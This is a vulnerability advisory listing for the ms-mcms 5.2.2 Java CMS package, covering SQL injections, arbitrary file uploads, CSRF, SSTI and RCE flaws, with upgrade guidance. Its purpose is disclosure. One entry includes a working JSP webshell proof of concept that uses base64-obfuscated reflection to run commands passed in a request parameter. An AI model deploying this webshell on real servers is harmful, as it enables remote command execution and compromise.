net.mingsoft:ms-mcms@5.2.2 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the net.mingsoft:ms-mcms package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability Vulnerable Version
  • M
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the ms/template/writeFileContent.do component.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.11 or higher.

(,5.2.11)
  • L
Cross-site Scripting (XSS)

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization when saving or updating articles.

How to fix Cross-site Scripting (XSS)?

Upgrade net.mingsoft:ms-mcms to version 5.2.11 or higher.

[0,5.2.11)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection due to improper sanitization, via the /cms/category/list endpoint.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.10 or higher.

(,5.2.10)
  • C
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via model lists in /mdiy/model/delete URI.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)
  • C
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the fieldName parameter in the /mdiy/page/verify URI.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)
  • H
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the TemplateAction class. Exploiting this vulnerability is possible by uploading a zip file containing a jsp file to the TemplateAction API, thus bypassing the file upload filter implemented in the upload functionality.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)
  • M
Cross-site Request Forgery (CSRF)

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) where it's possible to add an administrator account via ms/basic/manager/save.do.

How to fix Cross-site Request Forgery (CSRF)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • M
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload by allowing an attacker to execute arbitrary code through a crafted ZIP file.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

(,5.2.8)
  • C
SQL Injection

Affected versions of this package are vulnerable to SQL Injection in /mdiy/dict/list/ URI via the orderBy parameter.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

(,5.2.8)
  • C
SQL Injection

Affected versions of this package are vulnerable to SQL Injection in /mdiy/dict/listExcludeApp URI via the orderBy parameter.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

(,5.2.8)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the orderBy parameter at /dict/list.do.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)
  • M
Cross-site Request Forgery (CSRF)

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via /role/saveOrUpdateRole.do which allows attackers to escalate privileges and modify data.

How to fix Cross-site Request Forgery (CSRF)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • M
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via /cms/content/list. This is due to a lack of filtering and escaping of SQL data.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

[0,5.2.8)
  • C
Remote Code Execution (RCE)

Affected versions of this package are vulnerable to Remote Code Execution (RCE) by using a FreeMarker template function called Execute.

How to fix Remote Code Execution (RCE)?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

[0,5.2.6)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the categoryId parameter in IContentDao.xml.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via search.do in the file /mdiy/dict/listExcludeApp.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

[0,5.2.6)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via search.do in /web/MCmsAction.java.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
External Control of File Name or Path

Affected versions of this package are vulnerable to External Control of File Name or Path via the oldFileName variable of the writeFileContent function. If this variable is not equal to the fileName variable, the oldFileName file gets deleted.

How to fix External Control of File Name or Path?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
Server-side Template Injection (SSTI)

Affected versions of this package are vulnerable to Server-side Template Injection (SSTI) via the Template Management module, where it is possible to add a template with a crafted payload in order to execute commands on the underlying server.

How to fix Server-side Template Injection (SSTI)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the /file/upload endpoint. A .jspx file will circumvent the filtering set in place and allow the attacker to get a webshell.

## PoC

```jsp
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
    BASE64Decoder decoder = new BASE64Decoder();
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process e = (Process)
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                    Object[]{}), request.getParameter("cmd") );
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>
```

How to fix Arbitrary File Upload?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • M
Arbitrary File Deletion

Affected versions of this package are vulnerable to Arbitrary File Deletion via the unZip() function in net/mingsoft/basic/action/TemplateAction.java, where, after unzipping, the specified file is deleted (whether it exists or not).

How to fix Arbitrary File Deletion?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization in the categoryId parameter in ContentBizImpl.java.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the upload method. The only files that are restricted for upload are .exe and .jsp. This can lead to RCE when a webshell with a .jspx type, for example, is uploaded this way.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version or higher.

[0,)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the IDictBiz interface, through which the value of orderBy is directly spliced into the SQL statement without any filtering, allowing an attacker to exfiltrate sensitive data.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version or higher.

[0,)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the IModelDataBiz interface, which requires implementing the queryDiyFormData method. The way it is implemented allows the orderBy value to be injected into the statement when resolving a GET request.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version or higher.

[0,)
  • C
Arbitrary Code Execution

Affected versions of this package are vulnerable to Arbitrary Code Execution in the New Template module. It allows attackers to upload malicious zip archives, upload a new template, and add malicious code in the template to achieve command execution.

How to fix Arbitrary Code Execution?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

(,5.2.6)
  • C
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the com\mingsoft\basic\action\web\FileAction.java component. Since the upload interface does not verify the user login status, an attacker can use this interface to upload files without setting a cookie.

How to fix Arbitrary File Upload?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
Directory Traversal

Affected versions of this package are vulnerable to Directory Traversal via the com\mingsoft\cms\action\GeneraterAction.java file. An attacker can write a .jsp file to an arbitrary directory via a ../ Directory Traversal in the url parameter.

How to fix Directory Traversal?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)